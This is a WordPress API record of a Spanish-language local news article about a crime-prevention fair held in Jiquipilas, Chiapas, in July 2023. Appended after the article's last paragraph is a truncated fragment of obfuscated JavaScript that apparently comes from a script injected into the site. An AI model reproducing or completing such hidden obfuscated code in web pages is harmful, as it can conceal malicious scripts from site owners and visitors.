{"id":10860,"date":"2023-07-05T04:55:37","date_gmt":"2023-07-05T04:55:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10860"},"modified":"2023-07-05T04:56:00","modified_gmt":"2023-07-05T04:56:00","slug":"con-la-feria-de-la-prevencion-fortalecemos-los-valores-y-combatimos-los-delitos-hugo-lazaro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10860","title":{"rendered":"Con la Feria de la Prevenci\u00f3n fortalecemos los valores y combatimos los delitos; Hugo L\u00e1zaro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532925153-1024x576.jpg\" alt=\"\" class=\"wp-image-10861\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532925153-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532925153-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532925153-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688532925153.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Reconoci\u00f3 a FGE Y CEPSVYPC por respaldar estas acciones de prevenci\u00f3n del delito. <\/p>\n\n\n\n<p>\u2022 Agradeci\u00f3 a la maestra Emma Itzel Orantes y Nestor Eli Hern\u00e1ndez G\u00e1lvez Coordinador de Prevenci\u00f3n y Participaci\u00f3n Ciudadana por atestiguar esta feria de prevenci\u00f3n.  4 de julio del 2023. Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez reconoci\u00f3 a la  Fiscal\u00eda General del Estado (FGE), por impulsar la prevenci\u00f3n del delito a la ciudadan\u00eda con lo cual se fortalecen los valores y los lazos sociales.As\u00ed lo expuso durante la Feria de Prevenci\u00f3n Ciudadana que se llev\u00f3 a cabo en el domo del barrio La Ejidal con la participaci\u00f3n de alumnos de la escuela Secundaria T\u00e9cnica N\u00famero 8 y Secundaria Dr. Belisario Dom\u00ednguez.\u201cAgradezco a la Maestra Emma Itzel Orantes Ortega Directora del Centro Estatal de Prevenci\u00f3n Social de la Violencia y Participaci\u00f3n Ciudadana y al Licenciado N\u00e9stor Eli Hern\u00e1ndez G\u00e1lvez Coordinador de Prevenci\u00f3n y Participaci\u00f3n Ciudadana\u201d, dijo Hugo L\u00e1zaro.Se\u00f1al\u00f3 que es necesario que sigamos promoviendo entre los tres \u00f3rdenes de gobierno la cultura de la denuncia para evitar la violencia, ya que de esa forma se combate de manera m\u00e1s eficaz los delitos.Resalt\u00f3 que acercar los Stands con las diferentes instituciones brinda la oportunidad de conocer los servicios que ofrecen. En este sentido, reafirm\u00f3 que fue un evento muy importante en materia de prevenci\u00f3n ciudadana.Las autoridades recorrieron los m\u00f3dulos instalados de la diversas Fiscal\u00edas como de la Mujer, Ambiental, de Combate al Abigeato, de Adolescentes, Contra la Trata de Personas, Contra Feminicidio, Antisecuestro, Contra la Desaparici\u00f3n Forzada de Personas y la Cometida por Particulares y la Coordinaci\u00f3n de Prevenci\u00f3n y Participaci\u00f3n Ciudadana y de las cl\u00ednicas CENTRA.As\u00ed como del Secretariado Ejecutivo del Sistema Estatal de Seguridad P\u00fablica, de diversas \u00e1reas del Ayuntamiento y DIF de Jiquipilas, del Centro Estatal de Prevenci\u00f3n Social de la Violencia y Participaci\u00f3n Ciudadana, n\u00fameros de emergencia 911-089 y Tr\u00e1nsito del Estado.El Coordinador de PPC, N\u00e9stor Eli Hern\u00e1ndez G\u00e1lvez, agradeci\u00f3 la disposici\u00f3n de todos quienes hicieron posible esta feria. De la misma manera la Directora del CEPSVPC, Emma Itzel Orantes Ortega, subray\u00f3 la exitosa conjunci\u00f3n de esfuerzos para impulsar la prevenci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Reconoci\u00f3 a FGE Y CEPSVYPC por respaldar estas acciones de prevenci\u00f3n del delito. \u2022 Agradeci\u00f3 a la maestra Emma Itzel Orantes y Nestor Eli Hern\u00e1ndez G\u00e1lvez Coordinador de Prevenci\u00f3n y Participaci\u00f3n Ciudadana por atestiguar esta feria de prevenci\u00f3n. 4 de julio del 2023. Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez reconoci\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10861,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10860","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10860","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10860"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10860\/revisions"}],"predecessor-version":[{"id":10862,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10860\/revisions\/10862"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10861"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}